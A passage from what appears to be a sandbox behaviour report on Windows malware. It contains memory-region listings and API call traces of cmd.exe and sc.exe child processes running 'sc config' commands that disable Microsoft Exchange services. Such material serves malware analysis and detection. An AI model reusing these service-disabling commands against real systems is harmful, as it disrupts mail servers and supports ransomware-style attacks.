"c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7177 start_va = 0x7e6b0000 end_va = 0x7e7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6b0000" filename = "" Region: id = 7178 start_va = 0x7e7d6000 end_va = 0x7e7d8fff entry_point = 0x0 region_type = private name = "private_0x000000007e7d6000" filename = "" Region: id = 7179 start_va = 0x51f0000 end_va = 0x52cefff entry_point = 0x51f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7180 start_va = 0x4f10000 end_va = 0x4f21fff entry_point = 0x4f10000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 451 os_tid = 0xa7c [0130.040] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0130.040] __set_app_type (_Type=0x1) [0130.040] __p__fmode () returned 0x77ac4d6c [0130.040] __p__commode () returned 0x77ac5b1c [0130.040] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0130.041] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0130.041] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.043] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.043] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0130.043] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0130.043] _wcsicmp (_String1="config", _String2="query") returned -14 [0130.043] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0130.043] _wcsicmp (_String1="config", _String2="start") returned -16 [0130.043] _wcsicmp (_String1="config", _String2="pause") returned -13 [0130.043] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0130.043] _wcsicmp (_String1="config", _String2="control") returned -14 [0130.043] _wcsicmp (_String1="config", _String2="continue") returned -14 [0130.043] _wcsicmp (_String1="config", _String2="stop") returned -16 [0130.043] _wcsicmp (_String1="config", _String2="config") returned 0 [0130.043] ResolveDelayLoadedAPI () returned 0x77262c10 [0130.043] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x50f8540 [0130.045] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0130.045] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0130.045] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0130.045] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0130.045] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0130.045] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0130.045] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0130.045] OpenServiceW (hSCManager=0x50f8540, lpServiceName="MSExchangeFDS", dwDesiredAccess=0x3) returned 0x0 [0130.046] GetLastError () returned 0x424 [0130.046] _ultow (in: _Dest=0x424, _Radix=82704896 | out: _Dest=0x424) returned="1060" [0130.046] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0130.047] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x4edf9dc, nSize=0x2, Arguments=0x4edf9f4 | out: lpBuffer="裐ԏ靖ӭ蔔è") returned 0x62 [0130.047] GetFileType (hFile=0x3c) returned 0x2 [0130.047] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x4edf9c0 | out: lpMode=0x4edf9c0) returned 1 [0130.048] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x50f88d0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x4edf9d0, lpReserved=0x0 | out: lpBuffer=0x50f88d0*, lpNumberOfCharsWritten=0x4edf9d0*=0x62) returned 1 [0130.048] LocalFree (hMem=0x50f88d0) returned 0x0 [0130.048] LocalFree (hMem=0x0) returned 0x0 [0130.048] CloseServiceHandle (hSCObject=0x50f8540) returned 1 [0130.048] LocalFree (hMem=0x0) returned 0x0 [0130.048] exit (_Code=1060) Thread: id = 452 os_tid = 0x524 Process: id = "128" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x66507000" os_pid = "0x560" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeFBA start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7181 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7182 start_va = 0xe10000 end_va = 0x4e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 7183 start_va = 0x4e10000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 7184 start_va = 0x4e30000 end_va = 0x4e30fff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 7185 start_va = 0x4e40000 end_va = 0x4e53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e40000" filename = "" Region: id = 7186 start_va = 0x4e60000 end_va = 0x4e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 7187 start_va = 0x4ea0000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 7188 start_va = 0x4fa0000 end_va = 0x4fa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fa0000" filename = "" Region: id = 7189 start_va = 0x4fb0000 end_va = 0x4fb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fb0000" filename = "" Region: id = 7190 start_va = 0x4fc0000 end_va = 0x4fc1fff entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 7191 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7192 start_va = 0x7eab0000 end_va = 0x7ead2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eab0000" filename = "" Region: id = 7193 start_va = 0x7ead4000 end_va = 0x7ead4fff entry_point = 0x0 region_type = private name = "private_0x000000007ead4000" filename = "" Region: id = 7194 start_va = 0x7ead5000 end_va = 0x7ead5fff entry_point = 0x0 region_type = private name = "private_0x000000007ead5000" filename = "" Region: id = 7195 start_va = 0x7eadd000 end_va = 0x7eadffff entry_point = 0x0 region_type = private name = "private_0x000000007eadd000" filename = "" Region: id = 7196 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7197 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7198 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7199 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7200 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7201 start_va = 0x4fe0000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 7202 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7203 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7204 start_va = 0x51d0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 7205 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7246 start_va = 0x4e10000 end_va = 0x4e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e10000" filename = "" Region: id = 7247 start_va = 0x4ff0000 end_va = 0x50adfff entry_point = 0x4ff0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7248 start_va = 0x50b0000 end_va = 0x50effff entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 7249 start_va = 0x52d0000 end_va = 0x53cffff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 7250 start_va = 0x55b0000 end_va = 0x55bffff entry_point = 0x0 region_type = private name = "private_0x00000000055b0000" filename = "" Region: id = 7251 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7252 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7253 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7254 start_va = 0x7e9b0000 end_va = 0x7eaaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9b0000" filename = "" Region: id = 7255 start_va = 0x7eada000 end_va = 0x7eadcfff entry_point = 0x0 region_type = private name = "private_0x000000007eada000" filename = "" Region: id = 7256 start_va = 0x4e20000 end_va = 0x4e23fff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 7257 start_va = 0x4e30000 end_va = 0x4e33fff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 7258 start_va = 0x55c0000 end_va = 0x58f6fff entry_point = 0x55c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 453 os_tid = 0x9a0 [0130.201] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0130.202] __set_app_type (_Type=0x1) [0130.202] __p__fmode () returned 0x77ac4d6c [0130.202] __p__commode () returned 0x77ac5b1c [0130.202] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0130.202] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0130.202] GetCurrentThreadId () returned 0x9a0 [0130.202] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a0) returned 0x84 [0130.202] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.202] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0130.202] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.204] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.204] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4f9f954 | out: phkResult=0x4f9f954*=0x0) returned 0x2 [0130.205] VirtualQuery (in: lpAddress=0x4f9f95b, lpBuffer=0x4f9f90c, dwLength=0x1c | out: lpBuffer=0x4f9f90c*(BaseAddress=0x4f9f000, AllocationBase=0x4ea0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.205] VirtualQuery (in: lpAddress=0x4ea0000, lpBuffer=0x4f9f90c, dwLength=0x1c | out: lpBuffer=0x4f9f90c*(BaseAddress=0x4ea0000, AllocationBase=0x4ea0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.205] VirtualQuery (in: lpAddress=0x4ea1000, lpBuffer=0x4f9f90c, dwLength=0x1c | out: lpBuffer=0x4f9f90c*(BaseAddress=0x4ea1000, AllocationBase=0x4ea0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.205] VirtualQuery (in: lpAddress=0x4ea3000, lpBuffer=0x4f9f90c, dwLength=0x1c | out: lpBuffer=0x4f9f90c*(BaseAddress=0x4ea3000, AllocationBase=0x4ea0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.205] VirtualQuery (in: lpAddress=0x4fa0000, lpBuffer=0x4f9f90c, dwLength=0x1c | out: lpBuffer=0x4f9f90c*(BaseAddress=0x4fa0000, AllocationBase=0x4fa0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.205] GetConsoleOutputCP () returned 0x1b5 [0130.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.205] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0130.205] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.205] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0130.205] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.205] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.205] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.205] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.206] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.206] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.206] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.206] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0130.206] GetEnvironmentStringsW () returned 0x51d7d98* [0130.206] FreeEnvironmentStringsA (penv="A") returned 1 [0130.206] GetEnvironmentStringsW () returned 0x51d7d98* [0130.206] FreeEnvironmentStringsA (penv="A") returned 1 [0130.206] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f9e8b8 | out: phkResult=0x4f9e8b8*=0x94) returned 0x0 [0130.206] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x0, lpData=0x4f9e8c4*=0x55, lpcbData=0x4f9e8c0*=0x1000) returned 0x2 [0130.206] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x1, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.206] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x0, lpData=0x4f9e8c4*=0x1, lpcbData=0x4f9e8c0*=0x1000) returned 0x2 [0130.206] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x0, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.206] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x40, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x40, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x0, lpData=0x4f9e8c4*=0x40, lpcbData=0x4f9e8c0*=0x1000) returned 0x2 [0130.207] RegCloseKey (hKey=0x94) returned 0x0 [0130.207] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f9e8b8 | out: phkResult=0x4f9e8b8*=0x94) returned 0x0 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x0, lpData=0x4f9e8c4*=0x40, lpcbData=0x4f9e8c0*=0x1000) returned 0x2 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x1, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x0, lpData=0x4f9e8c4*=0x1, lpcbData=0x4f9e8c0*=0x1000) returned 0x2 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x0, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x9, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x4, lpData=0x4f9e8c4*=0x9, lpcbData=0x4f9e8c0*=0x4) returned 0x0 [0130.207] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f9e8bc, lpData=0x4f9e8c4, lpcbData=0x4f9e8c0*=0x1000 | out: lpType=0x4f9e8bc*=0x0, lpData=0x4f9e8c4*=0x9, lpcbData=0x4f9e8c0*=0x1000) returned 0x2 [0130.207] RegCloseKey (hKey=0x94) returned 0x0 [0130.207] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29833 [0130.207] srand (_Seed=0x5ad29833) [0130.207] GetCommandLineW () returned="/c sc config MSExchangeFBA start= disabled" [0130.207] GetCommandLineW () returned="/c sc config MSExchangeFBA start= disabled" [0130.207] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.207] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x51d9cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0130.207] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.207] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.207] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.207] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.207] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.207] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.207] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.207] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.207] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.207] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.207] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.207] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.208] GetEnvironmentStringsW () returned 0x51d7d98* [0130.208] FreeEnvironmentStringsA (penv="A") returned 1 [0130.208] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.208] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.208] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.208] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.208] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.208] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.208] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.208] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.208] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.208] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.208] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f9f690 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.208] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4f9f690, lpFilePart=0x4f9f688 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f9f688*="Desktop") returned 0x1d [0130.208] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.208] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4f9f410 | out: lpFindFileData=0x4f9f410) returned 0x51d05c8 [0130.208] FindClose (in: hFindFile=0x51d05c8 | out: hFindFile=0x51d05c8) returned 1 [0130.208] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4f9f410 | out: lpFindFileData=0x4f9f410) returned 0x51d05c8 [0130.208] FindClose (in: hFindFile=0x51d05c8 | out: hFindFile=0x51d05c8) returned 1 [0130.208] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0130.209] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4f9f410 | out: lpFindFileData=0x4f9f410) returned 0x51d05c8 [0130.209] FindClose (in: hFindFile=0x51d05c8 | out: hFindFile=0x51d05c8) returned 1 [0130.209] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.209] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0130.209] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0130.209] GetEnvironmentStringsW () returned 0x51d7d98* [0130.209] FreeEnvironmentStringsA (penv="=") returned 1 [0130.209] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.209] GetConsoleOutputCP () returned 0x1b5 [0130.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.209] GetUserDefaultLCID () returned 0x409 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4f9f7c0, cchData=128 | out: lpLCData="0") returned 2 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4f9f7c0, cchData=128 | out: lpLCData="0") returned 2 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4f9f7c0, cchData=128 | out: lpLCData="1") returned 2 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0130.210] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0130.210] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.211] GetConsoleTitleW (in: lpConsoleTitle=0x51daa38, nSize=0x104 | out: 